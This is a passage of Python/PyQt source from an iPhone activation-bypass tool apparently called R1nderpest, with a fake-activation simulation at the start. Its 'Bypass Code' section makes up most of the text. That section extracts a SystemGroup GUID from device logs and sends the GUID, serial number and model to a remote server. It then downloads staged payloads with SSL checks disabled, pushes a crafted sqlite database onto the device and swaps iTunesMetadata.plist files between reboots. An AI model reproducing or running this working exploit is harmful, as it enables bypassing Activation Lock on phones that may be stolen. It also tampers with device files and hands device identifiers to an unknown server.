        self.listWidget.addItem("[DEV] No real device will be touched")
        self.activationProgress.setValue(0)
        self.activationDone.setEnabled(False)

    def start_fake_activation(self):
        """Simulate the activation dialog without touching a real device."""
        self.activationDialog.show_centered()
        self.activationDetails.setVisible(False)
        self.detailsToggle.setChecked(False)
        self.activationDone.setEnabled(False)
        self.activationProgress.setValue(0)
        self.progressFrame.setGeometry(0, 0, 0, 51)
        self.listWidget.clear()
        self.activationStep.setText("Preparing developer simulation…")
        self.activateButton.setEnabled(False)

        steps = [
            (10, "Connecting to device…"),
            (28, "Reading device information…"),
            (47, "Checking compatibility…"),
            (65, "Preparing activation payload…"),
            (82, "Simulating rebooting device…"),
            (94, "Finalizing…"),
            (100, "Activation is complete. Click Done to continue."),
        ]
        self._fake_activation_index = 0

        if self._fake_activation_timer is not None:
            self._fake_activation_timer.stop()

        self._fake_activation_timer = QtCore.QTimer(self.activationDialog)
        self._fake_activation_timer.setInterval(550)

        def tick():
            if self._fake_activation_index >= len(steps):
                self._fake_activation_timer.stop()
                self.activateButton.setEnabled(True)
                return

            progress, message = steps[self._fake_activation_index]
            self.activationProgress.setValue(progress)
            self.progressFrame.setGeometry(0, 0, int((progress / 100.0) * self.pbFrame.width()), self.pbFrame.height())
            self.activationStep.setText(message)
            self.listWidget.addItem(f"[DEV] {message}")
            self._fake_activation_index += 1

            if progress >= 100:
                self.activationDone.setEnabled(True)
                self.activateButton.setEnabled(True)
                self._fake_activation_timer.stop()

        self._fake_activation_timer.timeout.connect(tick)
        self._fake_activation_timer.start()
        tick()

    def run_short_command(self, cmd: List[str], timeout: Optional[int] = None) -> Tuple[int, str, str]:
        try:
            env = os.environ.copy()
            bin_dir = str(Path(__file__).parent / "bin")
            env["PATH"] = bin_dir + os.pathsep + env["PATH"]
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=timeout,
                creationflags=self.CREATE_NO_WINDOW,
                env=env
            )
            return result.returncode, result.stdout.strip(), result.stderr.strip()
        except subprocess.TimeoutExpired:
            return 124, "", "Command timed out"
        except Exception as e:
            return 1, "", str(e)


    def find_binary(self, name: str) -> Optional[str]:
        bin_dir = Path(__file__).parent / "bin"
        path = bin_dir / name
        if path.is_file():
            return str(path)
        return shutil.which(name)


    def ideviceinfo_cmd(self, *args) -> List[str]:
        exe = "C:/R1nderpest/libimobiledevice/ideviceinfo.exe"
        return [exe, *args] if exe else ["ideviceinfo.exe", *args]


    def idevicediagnostics_cmd(self, *args) -> List[str]:
        exe = "C:/R1nderpest/libimobiledevice/idevicediagnostics.exe"
        return [exe, *args] if exe else ["idevicediagnostics.exe", *args]


    def get_device_info(self) -> Optional[dict]:
        info = {}
        keys = ["DeviceName", "ProductType", "ProductVersion", "SerialNumber", "UniqueDeviceID"]
        for key in keys:
            code, out, _ = self.run_short_command(self.ideviceinfo_cmd("-k", key), timeout=10)
            if code == 0 and out.strip():
                info[key] = out.strip()
        return info or None


    def restart_device(self) -> bool:
        self.listWidget.addItem("[*] Rebooting device...")
        code, _, _ = self.run_short_command(self.idevicediagnostics_cmd("restart"), timeout=30)
        return code == 0


    def wait_for_device(self, timeout: int = 65) -> bool:
        start = time.time()
        while time.time() - start < timeout:
            code, out, _ = self.run_short_command(self.ideviceinfo_cmd(), timeout=10)
            if code == 0 and "ERROR:" not in out and "No device found" not in out:
                udid_code, udid_out, _ = self.run_short_command(self.ideviceinfo_cmd("-k", "UniqueDeviceID"), timeout=10)
                if udid_code == 0 and udid_out.strip():
                    self.listWidget.addItem("[*] Device connected!")
                    time.sleep(self.POST_CONNECT_DELAY)
                    return True
            time.sleep(4)
        self.listWidget.addItem("[*] Device did not reconnected!")
        return False


    def collect_syslog_archive(self, archive_path: Path) -> bool:
        self.listWidget.addItem("[*] Collecting device logs ...")
        with tempfile.TemporaryDirectory() as tmpdir:
            log_archive = Path(tmpdir) / "syslog.logarchive"
            try:
                with create_using_usbmux() as lockdown:
                    with OsTraceService(lockdown) as os_trace:
                        os_trace.collect(out=str(log_archive), size_limit=12000, age_limit=3600)
                if not log_archive.exists():
                    return False
                archive_path.mkdir(parents=True, exist_ok=True)
                if log_archive.is_file():
                    shutil.copy2(log_archive, archive_path / "syslog.logarchive")
                elif log_archive.is_dir():
                    for item in log_archive.rglob("*"):
                        if item.is_file():
                            rel = item.relative_to(log_archive)
                            dst = archive_path / rel
                            dst.parent.mkdir(parents=True, exist_ok=True)
                            shutil.copy2(item, dst)
                total_size = sum(f.stat().st_size for f in archive_path.rglob("*") if f.is_file())
                return total_size >= self.MIN_ARCHIVE_SIZE
            except Exception as e:
                self.listWidget.addItem(f"[*] Log collection failed! {e}")
                return False


    def extract_guid_from_archive(self, archive_path: Path) -> Optional[str]:
        exe = "C:/R1nderpest/dependencies/unifiedlog_iterator.exe"
        cmd = [exe, "--mode", "log-archive", "--input", str(archive_path), "--format", "jsonl"]
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = subprocess.SW_HIDE

        proc = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.DEVNULL,
            stdin=subprocess.DEVNULL,
            text=False,
            bufsize=4 * 1024 * 1024,
            startupinfo=startupinfo,
            creationflags=self.CREATE_NO_WINDOW
        )

        buf = bytearray()
        scan_pos = 0
        lines_scanned = 0

        try:
            while proc.poll() is None:
                chunk = proc.stdout.read(4 * 1024 * 1024)
                if not chunk:
                    break
                buf.extend(chunk)
                while True:
                    nl = buf.find(b"\n", scan_pos)
                    if nl == -1:
                        if scan_pos > 0:
                            del buf[:scan_pos]
                            scan_pos = 0
                        break
                    start, end = scan_pos, nl
                    scan_pos = nl + 1
                    lines_scanned += 1
                    segment = buf[start:end].upper()
                    if not any(pat in segment for pat in self.BLDB_PATTERNS_UPPER):
                        continue
                    m = self.GUID_REGEX.search(buf[start:end])
                    if m:
                        guid_bytes = m.group(0)
                        try:
                            guid = guid_bytes.decode("ascii").upper()
                            parts = guid.split('-')
                            if len(parts) == 5 and \
                            len(parts[0]) == 8 and all(len(p) == 4 for p in parts[1:4]) and len(parts[4]) == 12 and \
                            parts[2].startswith('4') and parts[3][0] in '89AB' and \
                            all(c in '0123456789ABCDEF' for c in guid.replace('-', '')):
                                proc.terminate()
                                try:
                                    proc.wait(timeout=3)
                                except:
                                    proc.kill()
                                return guid
                        except:
                            pass
            self.listWidget.addItem("[*] Could not get GUID!")
            return None
        finally:
            if proc.poll() is None:
                proc.kill()


    def get_guid_auto(self) -> Optional[str]:
        for attempt in range(1, 4):
            self.listWidget.addItem(f"[*] Attempt {attempt} / 3")
            if not (self.restart_device() and self.wait_for_device()):
                self.listWidget.addItem("[*] Could not connect to device!")
                return None
            with tempfile.TemporaryDirectory() as tmpdir:
                archive = Path(tmpdir) / "logs"
                if not self.collect_syslog_archive(archive):
                    self.listWidget.addItem("[*] Log collection failed!")
                    if attempt < 3:
                        time.sleep(10)
                    continue
                guid = self.extract_guid_from_archive(archive)
                if guid:
                    return guid
                self.listWidget.addItem("[*] Could not get GUID!")
                if attempt < 3:
                    time.sleep(10)
        self.listWidget.addItem("[*] Error while searching GUID!")
        return None



    ## Bypass Code

    def _run_cmd(self, cmd, timeout=None):
        try:
            res = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
            return res.returncode, res.stdout.strip(), res.stderr.strip()
        except subprocess.TimeoutExpired:
            return 124, "", "Timeout"
        except Exception as e:
            return 1, "", str(e)


    def _curl_download(self, url, output_file):
        """Download with SSL verification disabled"""
        curl_cmd = [
            "curl", "-L", 
            "-k",
            "-f",  # Fail on HTTP errors
            "--connect-timeout", "30",
            "--max-time", "120",
            "-o", output_file,
            url
        ]
        

        code, out, err = self._run_cmd(curl_cmd)
        
        if code != 0:

            return False
            
        if os.path.exists(output_file) and os.path.getsize(output_file) > 0:

            return True
        else:

            return False

    def reboot_device(self):
        """Reboots device and waits for readiness"""


        # Try using pymobiledevice3 for reboot
        code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "restart"])
        if code != 0:
            # Fallback to C:/R1nderPest/libimobiledevice/idevicediagnostics.exe
            code, _, err = self._run_cmd(["C:/R1nderPest/libimobiledevice/idevicediagnostics.exe", "restart"])
            if code != 0:
                input()
                return True
        

        
        # Wait for device reboot
        for i in range(60):  # 60 attempts × 5 seconds = 5 minutes
            time.sleep(5)
            code, _, _ = self._run_cmd(["C:/R1nderPest/libimobiledevice/ideviceinfo.exe"])
            if code == 0:
                self.listWidget.addItem("[*] Device reconnected!")
                # Give device extra time for full boot
                time.sleep(10)
                return True
            
            if i % 6 == 0:  # Every 30 seconds
                print("[*] Waiting...")
        

        return False

    def verify_dependencies(self):
        if shutil.which("ifuse"):
            self.afc_mode = "ifuse"
        else:
            self.afc_mode = f"C:/R1nderPest/dependencies/pymobiledevice3.exe"

    def mount_afc(self):
        if self.afc_mode != "ifuse":
            return True
        os.makedirs(self.mount_point, exist_ok=True)
        code, out, _ = self._run_cmd(["mount"])
        if self.mount_point in out:
            return True
        for i in range(5):
            code, _, _ = self._run_cmd(["ifuse", self.mount_point])
            if code == 0:
                return True
            time.sleep(2)
        return False

    def unmount_afc(self):
        if self.afc_mode == "ifuse" and os.path.exists(self.mount_point):
            self._run_cmd(["umount", self.mount_point])
            try:
                os.rmdir(self.mount_point)
            except OSError:
                pass

    def _cleanup(self):
        """Ensure cleanup on exit"""
        self.unmount_afc()

    def detect_device(self):

        code, out, err = self._run_cmd(["C:/R1nderPest/libimobiledevice/ideviceinfo.exe"])
        if code != 0:
            self.listWidget.addItem("[*] Device not found!")
            sys.exit(1)
        
        info = {}
        for line in out.splitlines():
            if ": " in line:
                key, val = line.split(": ", 1)
                info[key.strip()] = val.strip()
        self.device_info = info
        
        
        if info.get('ActivationState') == 'Activated':
            self.listWidget.addItem("[*] Device is already activated!")

    def get_guid_manual(self):
        """Manual GUID input with validation"""

        
        UUID_PATTERN = re.compile(r'^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$', re.IGNORECASE)
        
        while True:
            guid_input = input(f"\n{Style.BLUE}➤ Enter SystemGroup GUID:{Style.RESET} ").strip()
            if UUID_PATTERN.match(guid_input):
                return guid_input.upper()
            
    def parse_tracev3_structure(self, data):
        """Parses tracev3 file structure for more precise search"""
        signatures = []
        
        # Search for database-related strings
        db_patterns = [
            b'BLDatabaseManager',
            b'BLDatabase',
            b'BLDatabaseManager.sqlite', 
            b'bookassetd [Database]: Store is at file:///private/var/containers/Shared/SystemGroup',
        ]
        
        for pattern in db_patterns:
            pos = 0
            while True:
                pos = data.find(pattern, pos)
                if pos == -1:
                    break
                signatures.append(('string', pattern, pos))
                pos += len(pattern)
        
        return signatures

    def extract_guid_candidates(self, data, context_pos, window_size=512):
        """Extracts GUIDs with contextual analysis"""
        candidates = []
        
        # Extended GUID pattern
        guid_pattern = re.compile(
            rb'([0-9A-F]{8}[-][0-9A-F]{4}[-][0-9A-F]{4}[-][0-9A-F]{4}[-][0-9A-F]{12})',
            re.IGNORECASE
        )
        
        # Search in context window
        start = max(0, context_pos - window_size)
        end = min(len(data), context_pos + window_size)
        context_data = data[start:end]
        
        # GUID search
        for match in guid_pattern.finditer(context_data):
            guid = match.group(1).decode('ascii').upper()
            relative_pos = match.start() + start - context_pos
            
            # Extended GUID validation
            if self.validate_guid_structure(guid):
                candidates.append({
                    'guid': guid,
                    'position': relative_pos,
                    'context': self.get_context_string(context_data, match.start(), match.end())
                })
        
        return candidates

    def validate_guid_structure(self, guid):
        """Extended GUID structure validation"""
        try:
            # Check GUID version (RFC 4122)
            parts = guid.split('-')
            if len(parts) != 5:
                return False
            
            # Check part lengths
            if len(parts[0]) != 8 or len(parts[1]) != 4 or len(parts[2]) != 4 or len(parts[3]) != 4 or len(parts[4]) != 12:
                return False
            
            # Check hex characters
            hex_chars = set('0123456789ABCDEF')
            clean_guid = guid.replace('-', '')
            if not all(c in hex_chars for c in clean_guid):
                return False
            
            # Check version (4th character of 3rd group should be 4)
            version_char = parts[2][0]
            if version_char not in '4':
                return False  # iOS commonly uses version 4
            
            # Check variant (8,9,A,B - 2 high bits)
            variant_char = parts[3][0]
            if variant_char not in '89AB':
                return False
            
            return True
            
        except Exception:
            return False

    def get_context_string(self, data, start, end, context_size=50):
        """Gets context string around GUID"""
        context_start = max(0, start - context_size)
        context_end = min(len(data), end + context_size)
        
        context = data[context_start:context_end]
        try:
            # Try to decode as text
            return context.decode('utf-8', errors='replace')
        except:
            # For binary data show hex
            return binascii.hexlify(context).decode('ascii')

    def analyze_guid_confidence(self, guid_candidates):
        """Analyzes confidence in found GUIDs"""
        if not guid_candidates:
            return None
        
        # Group by GUID
        guid_counts = Counter(candidate['guid'] for candidate in guid_candidates)
        
        # Calculate score for each GUID
        scored_guids = []
        for guid, count in guid_counts.items():
            score = count * 10  # Base score by occurrence count
            
            # Additional confidence factors
            positions = [c['position'] for c in guid_candidates if c['guid'] == guid]
            
            # Preference for GUIDs close to BLDatabaseManager
            close_positions = [p for p in positions if abs(p) < 100]
            if close_positions:
                score += len(close_positions) * 5
            
            # Preference for GUIDs before BLDatabaseManager (more common in logs)
            before_positions = [p for p in positions if p < 0]
            if before_positions:
                score += len(before_positions) * 3
            
            scored_guids.append((guid, score, count))
        
        # Sort by score
        scored_guids.sort(key=lambda x: x[1], reverse=True)
        return scored_guids

    def confirm_guid_manual(self, guid):

        
        response = "y"

        self.global_GUID = guid

        return response 

    def get_guid_enhanced(self):
        """Enhanced GUID extraction version"""
        self.attempt_count += 1
        self.listWidget.addItem(f"[*] GUID search attempt {self.attempt_count}/{self.max_attempts}")
        
        udid = self.deviceUDID.text().replace("UDID: ", "")
        log_path = f"{udid}.logarchive"
        
        try:
            QtWidgets.QApplication.processEvents()
            # Collect logs
            self.listWidget.addItem("[*] Collecting device logs...")
            code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "syslog", "collect", log_path], timeout=120)
            if code != 0:
                self.listWidget.addItem("[*] Log collection failed!")
                return None
            
            trace_file = os.path.join(log_path, "logdata.LiveData.tracev3")
            if not os.path.exists(trace_file):
                self.listWidget.addItem("[*] tracev3 file not found!")
                return None
            
            # Read and analyze file
            with open(trace_file, 'rb') as f:
                data = f.read()
            
            size_mb = len(data) / (1024 * 1024)

            
            # Search for key structures
            signatures = self.parse_tracev3_structure(data)

            
            # Collect GUID candidates
            all_candidates = []
            bl_database_positions = []
            
            for sig_type, pattern, pos in signatures:
                if pattern == b'BLDatabaseManager':
                    bl_database_positions.append(pos)
                    candidates = self.extract_guid_candidates(data, pos)
                    all_candidates.extend(candidates)
                    
                    if candidates:
                        self.listWidget.addItem("[*] GUID Found!")
            
            if not all_candidates:
                return None
            
            # Confidence analysis
            scored_guids = self.analyze_guid_confidence(all_candidates)
            if not scored_guids:
                return None
            
            # Log results

            for guid, score, count in scored_guids[:5]:
                best_guid, best_score, best_count = scored_guids[0]
            
            # Determine confidence level
            if best_score >= 30:
                confidence = "HIGH"
            elif best_score >= 15:
                confidence = "MEDIUM" 
            else:
                confidence = "LOW"
            
            # Additional verification for low confidence
            if confidence in ["LOW", "MEDIUM"]:
                if not self.confirm_guid_manual(best_guid):
                    return None
            
            return best_guid
            
        finally:
            # Cleanup
            if os.path.exists(log_path):
                shutil.rmtree(log_path)

    def get_guid_auto_with_retry(self):
        """Auto-detect GUID with reboot retry mechanism"""
        self.attempt_count = 0
        
        while self.attempt_count < self.max_attempts:
            guid = self.get_guid_enhanced()
            
            if guid:
                return guid
            
            # If not last attempt - reboot device
            if self.attempt_count < self.max_attempts:
                self.listWidget.addItem("[*] Rebooting device...")

                if not self.reboot_device():
                    self.listWidget.addItem("[*] Failed to reboot device!")
                
                # After reboot re-detect device
                self.listWidget.addItem("[*] Re-detecting device after reboot...")
                self.detect_device()
                
                # Small pause before next attempt
                time.sleep(5)
            else:
                self.listWidget.addItem("[*] GUID not found!")
        
        return None



    def get_all_urls_from_server(self, prd, guid, sn):
        """Requests all three URLs (stage1, stage2, stage3) from the server"""
        params = f"prd={prd}&guid={guid}&sn={sn}&ver={self.iOS}"
        url = f"{self.api_url}?{params}"
        

        code, out, err = self._run_cmd(["curl", "-s", "-k", url])
        if code != 0:
            return None, None, None

        try:
            data = json.loads(out)
            if data.get('success'):
                stage1_url = data['links']['step1_fixedfile']
                stage2_url = data['links']['step2_bldatabase']
                stage3_url = data['links']['step3_final']
                return stage1_url, stage2_url, stage3_url
            else:
                return None, None, None
        except json.JSONDecodeError:
            return None, None, None

    def preload_stage(self, stage_name, stage_url):
        """Pre-load individual stage with SSL bypass"""
        

        temp_file = f"temp_{stage_name}"
        success = self._curl_download(stage_url, temp_file)
        
        if success:
            if os.path.exists(temp_file):
                os.remove(temp_file)
            return True
        else:
            self.listWidget.addItem("[*] Failed to pre-load!")
            QtWidgets.QApplication.processEvents()
            return False
        
        


    ###############

    def ShowLoadingPopup(self, message: str):
        self.LoadingNotification.show()
        self.loadingText.setText(message)

    def HideLoadingPopup(self):
        self.LoadingNotification.hide()

    def StartHacktivating(self):
        hackThread = threading.Thread(target=self.Hacktivating)
        hackThread.start()

    def Hacktivating(self):

        global onlyFindGuid

        self.activateButton.hide()

        self.pbFrame.show()

        self.listWidget.addItem("[*] Process started!")

        
        QtWidgets.QApplication.processEvents()


        time.sleep(0.4)

        process = subprocess.Popen(
                ['C:/R1nderpest/libimobiledevice/ideviceinfo.exe'],
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                stdin=subprocess.PIPE,
                text=True,
                bufsize=1
        )

        output = str(process.stdout.read())


        process.terminate()

        self.setProgress(progress=20)

        

        if "ERROR: No device found!" in output:
            self.listWidget.addItem("[*] Failed to connect to device!")
            QtWidgets.QApplication.processEvents()

            sys.exit()
        elif "ProductType" in output:
            self.listWidget.addItem("[*] Successfully connected to device!")
            self.listWidget.addItem("[*] Starting GUID search... This may take a few minutes...")

            QtWidgets.QApplication.processEvents()
        else:
            self.listWidget.addItem("[*] Failed to connect to device!")
            QtWidgets.QApplication.processEvents()
            
        
        try:
            if "--only-find-guid" in sys.argv[1]:
                self.listWidget.addItem("[*] --only-find-guid argument detected! Proceeding without activating...")
                onlyFindGuid = True
                self.guid = self.get_guid_auto()
            else:
                try:
                    self.guid = sys.argv[1]
                    self.listWidget.addItem(f"[*] Detected custom GUID!")
                    self.listWidget.addItem(f"[*] Using GUID: {sys.argv[1]}")
                    onlyFindGuid = False
                except:
                    onlyFindGuid = False
                    self.guid = self.get_guid_auto()
        except Exception as e:
            self.guid = self.get_guid_auto()

        self.listWidget.addItem(f"[*] GUID: {self.guid}")

        self.global_GUID = self.guid

        if not self.guid:
            self.listWidget.addItem("[*] Could not get GUID! ")

            
        
            self.listWidget.addItem("[*] Erase your device using Apple Configurator and then try again.")
            QtWidgets.QApplication.processEvents()
            sys.exit()
            

        if onlyFindGuid:
            sys.exit()
        self.setProgress(progress=20)

        self.ShowLoadingPopup(message="Checking server availability...")

        time.sleep(0.5)

        r = requests.get(url=f"{self.api_url}?prd=iPhone13,4&sn=SN&guid=GUID&ver=26.1")

        time.sleep(0.5)
        self.HideLoadingPopup()
        time.sleep(0.2)
        if "success': True" in str(r.json()):
            pass
        else:
            self.ShowInfoPopup(button_text="Close", message="Server is not available!", title="Status")
            self.listWidget.addItem("[*] There is no connection to the server! The server may not be available in your country.")
            sys.exit()

        self.listWidget.addItem("[*] Requesting payload...")
        QtWidgets.QApplication.processEvents()



        prd = output.split("ProductType: ")[1].split("\n")[0]
        sn = output.split("SerialNumber: ")[1].split("\n")[0]


        stage1_url, stage2_url, stage3_url = self.get_all_urls_from_server(prd, self.guid, sn)

        if not stage1_url or not stage2_url or not stage3_url:
            self.listWidget.addItem("[*] Failed to get URLs from server!")
            QtWidgets.QApplication.processEvents()
            sys.exit(1)
        
        

        self.setProgress(progress=30)

        self.listWidget.addItem("[*] Pre-loading payload...")
        QtWidgets.QApplication.processEvents()

        stages = [
            ("stage1", stage1_url),
            ("stage2", stage2_url), 
            ("stage3", stage3_url)
        ]
        
        for stage_name, stage_url in stages:
            self.preload_stage(stage_name, stage_url)
            time.sleep(1)

        self.setProgress(progress=50)


        self.listWidget.addItem("[*] Downloading files...")
        QtWidgets.QApplication.processEvents()
        local_db = "downloads.28.sqlitedb"
        if os.path.exists(local_db):
            os.remove(local_db)
        

        if not self._curl_download(stage3_url, local_db):
            self.listWidget.addItem("[*] Failed to download payload!")
            QtWidgets.QApplication.processEvents()
            sys.exit(1)

        self.setProgress(progress=55)

        self.listWidget.addItem("[*] Validating downloaded files...")

        conn = sqlite3.connect(local_db)
        try:
            res = conn.execute("SELECT count(*) FROM sqlite_master WHERE type='table' AND name='asset'")
            if res.fetchone()[0] == 0:
                raise Exception("Invalid DB - no asset table found")
            
            res = conn.execute("SELECT COUNT(*) FROM asset")
            count = res.fetchone()[0]
            if count == 0:
                raise Exception("Invalid DB - no records in asset table")
                
            self.listWidget.addItem("[*] Database validated.")
            
            res = conn.execute("SELECT pid, url, local_path FROM asset")
            for row in res.fetchall():
                self.listWidget.addItem(f"[*] Please wait...")
                
        except Exception as e:
            self.listWidget.addItem("[*] Invalid database!")
            QtWidgets.QApplication.processEvents()
            sys.exit(1)
        finally:
            conn.close()

        self.setProgress(progress=65)

        self.listWidget.addItem("[*] Uploading payload...")
        QtWidgets.QApplication.processEvents()


        target = "/Downloads/downloads.28.sqlitedb"
        
        if self.afc_mode == "ifuse":
            if not self.mount_afc():
                
                
                self.afc_mode = f"C:/R1nderPest/dependencies/pymobiledevice3.exe"
        
        if self.afc_mode == "ifuse":
            fpath = self.mount_point + target
            if os.path.exists(fpath):
                os.remove(fpath)
            shutil.copy(local_db, fpath)
            self.listWidget.addItem("[*] Uploaded!")
            
        else:
            self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "rm", target])
            code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "push", local_db, target])
            if code != 0:
                self.listWidget.addItem("[*] Error while uploading!")
                QtWidgets.QApplication.processEvents()
                sys.exit(1)
            self.listWidget.addItem("[*] Uploaded!")
            
        self.listWidget.addItem("[*] Payload successfully deployed!")


        self.setProgress(progress=75)


        self.listWidget.addItem("[*] Cleaning up files and scanning for old files ...")
        QtWidgets.QApplication.processEvents()

        try:
            code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "rm", "/iTunes_Control/iTunes/iTunesMetadata.plist"])
            if code == 0:
                self.listWidget.addItem("[*] Deleted old iTunesMetadata.plist !")
            else:
                self.listWidget.addItem("[*] Old file not found, continuing ...")
            code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "rm", "/Books/asset.epub"])
            if code == 0:
                self.listWidget.addItem("[*] Deleted old asset.epub !")
            else:
                self.listWidget.addItem("[*] Old file not found, continuing ...")
            code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "rm", "/iTunes_Control/iTunes/iTunesMetadata.plist.ext"])
            if code == 0:
                self.listWidget.addItem("[*] Deleted old iTunesMetadata.plist.ext !")
            else:
                self.listWidget.addItem("[*] Old file not found, continuing ...")
        except Exception as e:
            self.listWidget.addItem("[*] Old file not found, continuing!")

        for wal_file in ["/Downloads/downloads.28.sqlitedb-wal", "/Downloads/downloads.28.sqlitedb-shm"]:
            if self.afc_mode == "ifuse":
                fpath = self.mount_point + wal_file
                if os.path.exists(fpath):
                    try:
                        os.remove(fpath)
                    except Exception as e:
                        self.listWidget.addItem("[*] Failed to remove!")
            else:
                code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "rm", wal_file])
                if code == 0:
                    self.listWidget.addItem("[*] Removed files!")
                else:
                    if "ENOENT" not in err and "No such file" not in err:
                        self.listWidget.addItem("[*] Error while removing files. Skipping...")
                    else:
                        self.listWidget.addItem(f"[*] {wal_file} not present!")

        self.setProgress(progress=80)


        self.listWidget.addItem("[*] Rebooting device...")
        QtWidgets.QApplication.processEvents()
        if not self.reboot_device():
            self.listWidget.addItem("[*] Reboot failed! Skipping...")

        self.listWidget.addItem("[*] Waiting 50s for iTunesMetadata.plist...")

        QtWidgets.QApplication.processEvents()
        for _ in range(10):
            time.sleep(5)

        src = "/iTunes_Control/iTunes/iTunesMetadata.plist"
        dst_books = "/Books/iTunesMetadata.plist"

        def afc_copy(src_path, dst_path):
            try:
                if self.afc_mode == "ifuse":
                    if not self.mount_afc():
                        raise RuntimeError("ifuse remount failed")
                    src_local = self.mount_point + src_path
                    dst_local = self.mount_point + dst_path
                    if not os.path.exists(src_local) or os.path.getsize(src_local) == 0:
                        return False
                    os.makedirs(os.path.dirname(dst_local), exist_ok=True)
                    shutil.copy2(src_local, dst_local)
                    return True
                else:
                    tmp = "temp_plist_copy.plist"
                    code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "pull", src_path, tmp])
                    if code != 0 or not os.path.exists(tmp) or os.path.getsize(tmp) == 0:
                        if os.path.exists(tmp):
                            os.remove(tmp)
                        return False
                    code2, _, err2 = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "afc", "push", tmp, dst_path])
                    os.remove(tmp)
                    return code2 == 0
            except Exception:
                return False

        # Copy → /Books/
        
        self.listWidget.addItem("[*] Copying files...")
        if afc_copy(src, dst_books):
            self.listWidget.addItem("[*] Successfully copied!")
            self.setProgress(progress=89)
            QtWidgets.QApplication.processEvents()
        else:
            
            self.listWidget.addItem("[*] iTunesMetadata.plist not found!")
            self.listWidget.addItem("[*] Make sure that the device is connected to the SAME WI-FI NETWORK as the computer")
            self.listWidget.addItem("[*] Error while activating your device!")

            sys.exit()

        self.listWidget.addItem("[*] Rebooting...")
        if not self.reboot_device():
            self.listWidget.addItem("[*] Reboot failed! Skipping...")


        QtWidgets.QApplication.processEvents()

        self.setProgress(progress=90)

        # Copy back: /Books/ → /iTunes_Control/iTunes/
        self.listWidget.addItem("[*] Copying files...")
        if afc_copy(dst_books, src):

            self.listWidget.addItem("[*] Successfully copied files!")
        else:

            self.listWidget.addItem("[*] Failed to copy files!")
            
        self.listWidget.addItem("[*] Waiting 15s for bookassetd...")

        QtWidgets.QApplication.processEvents()
        self.setProgress(progress=96)
        time.sleep(40)


        self.listWidget.addItem("[*] Rebooting...")
        self.reboot_device()


        QtWidgets.QApplication.processEvents()
        self.setProgress(progress=100)
        time.sleep(4)
        self.listWidget.addItem("[*] Done! Activate your device as usual.")

        self.ShowInfoPopup(button_text="Close", message="Activate your device as usual.", title="Done!")

        QtWidgets.QApplication.processEvents()

        self.activateButton.setEnabled(False)

        QtWidgets.QApplication.processEvents()

        

            

    def ClosePopup(self):
        self.InfoNotification.hide()

    def ShowInfoPopup(self, button_text: str, message: str, title: str):
        self.InfoNotification.show()
        self.messageTitle.setText(title)
        self.messageContent.setText(message)
        self.closePopup.setText(button_text)

    def MoveBarThread(self):
          moveBarThread = threading.Thread(target=self.MoveBar)
          moveBarThread.start()

    def setProgress(self, progress: float):
        progress = max(0.0, min(100.0, float(progress)))
        pb_width = self.progressFrame.width()
        new_width = round((progress / 100.0) * self.pbFrame.width())
        height = self.pbFrame.height()

        while pb_width != new_width:
            time.sleep(0.004)
            pb_width += 1 if new_width > pb_width else -1
            self.progressFrame.setGeometry(0, 0, pb_width, height)

    def MoveBar(self):
          global animation
          while animation:
                if self.pb1.x() != 280:
                      barPositionX = self.pb1.x()
                      time.sleep(0.03)
                      barPositionX += 5
                      self.pb1.setGeometry(barPositionX, 0, 31, 21)
                      QtWidgets.QApplication.processEvents()
                else:
                      while self.pb1.x() != 0:
                            barPositionX = self.pb1.x()
                            time.sleep(0.03)
                            barPositionX -= 5
                            self.pb1.setGeometry(barPositionX, 0, 31, 21)
                            QtWidgets.QApplication.processEvents()

    def SearchingForDevices(self):

        while True:
                global version

                if getattr(self, "_fake_device_mode", False):
                        time.sleep(0.5)
                        continue

                time.sleep(1)

                process = subprocess.Popen(
                        ['C:/R1nderpest/libimobiledevice/ideviceinfo.exe'],
                        stdout=subprocess.PIPE,
                        stderr=subprocess.STDOUT,
                        stdin=subprocess.PIPE,
                        text=True,
                        bufsize=1
                )

                output = str(process.stdout.read())

                process.terminate()


                if "ERROR: No device found!" in output:
                        self.introStatusLabel.setText("Searching for devices...")
                else:
                        self.introStatusLabel.setText("Device connected!")
                        self.listWidget.addItem("[*] Device connected!")
                        try:
                                ProductVersion = output.split("ProductVersion: ")[1].split("\n")[0]
                                ProductType = output.split("ProductType: ")[1].split("\n")[0]
                                UDID = output.split("UniqueDeviceID: ")[1].split("\n")[0]
                                DeviceName = output.split("DeviceName: ")[1].split("\n")[0]
                                ActivationState = output.split("ActivationState: ")[1].split("\n")[0]

                                self.iOS = f"{ProductVersion}"
                                self.device_info = {
                                    "DeviceName": DeviceName,
                                    "ProductType": ProductType,
                                    "ProductVersion": ProductVersion,
                                    "UniqueDeviceID": UDID,
                                    "ActivationState": ActivationState,
                                }

                                self.deviceName.setText(DeviceName)
                                self.deviceUDID.setText(f"UDID: {UDID}")
                                self._upsert_device_item(DeviceName, UDID, ProductType)
                                if ActivationState == "Activated":
                                      self.activationState.setText(f"Activation state: Yes")
                                      self.activateButton.setEnabled(False)
                                      self.activateButton.setText("Unlocked")
                                      self.listWidget.addItem("[*] Your device is already activated!")
                                      self.activateButton.setStyleSheet("""
